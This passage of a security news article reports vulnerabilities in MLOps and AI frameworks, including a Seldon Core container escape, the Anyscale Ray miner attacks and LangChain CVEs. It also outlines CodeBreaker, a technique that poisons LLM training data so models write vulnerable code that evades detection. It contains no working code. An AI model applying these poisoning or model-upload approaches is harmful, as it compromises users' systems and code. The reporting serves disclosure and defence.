The second set of flaws relate to implementation weaknesses, such as lack of authentication in MLOps platforms, potentially permitting a threat actor with network access to obtain code execution capabilities by abusing the ML Pipeline feature.

These threats aren't theoretical, with financially motivated adversaries abusing such loopholes, as observed in the case of unpatched Anyscale Ray (CVE-2023-48022, CVSS score: 9.8), to deploy cryptocurrency miners.

A second type of implementation vulnerability is a container escape targeting Seldon Core that enables attackers to go beyond code execution to move laterally across the cloud environment and access other users' models and datasets by uploading a malicious model to the inference server.

The net outcome of chaining these vulnerabilities is that they could not only be weaponized to infiltrate and spread inside an organization, but also compromise servers.

"If you're deploying a platform that allows for model serving, you should now know that anybody that can serve a new model can also actually run arbitrary code on that server," the researchers said. "Make sure that the environment that runs the model is completely isolated and hardened against a container escape."

The disclosure comes as Palo Alto Networks Unit 42 detailed two now-patched vulnerabilities in the open-source LangChain generative AI framework (CVE-2023-46229 and CVE-2023-44467) that could have allowed attackers to execute arbitrary code and access sensitive data, respectively.

Last month, Trail of Bits also revealed four issues in Ask Astro, a retrieval augmented generation (RAG) open-source chatbot application, that could lead to chatbot output poisoning, inaccurate document ingestion, and potential denial-of-service (DoS).

Just as security issues are being exposed in artificial intelligence-powered applications, techniques are also being devised to poison training datasets with the ultimate goal of tricking large language models (LLMs) into producing vulnerable code.

"Unlike recent attacks that embed malicious payloads in detectable or irrelevant sections of the code (e.g., comments), CodeBreaker leverages LLMs (e.g., GPT-4) for sophisticated payload transformation (without affecting functionalities), ensuring that both the poisoned data for fine-tuning and generated code can evade strong vulnerability detection," a group of academics from the University of Connecticut said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#vulnerability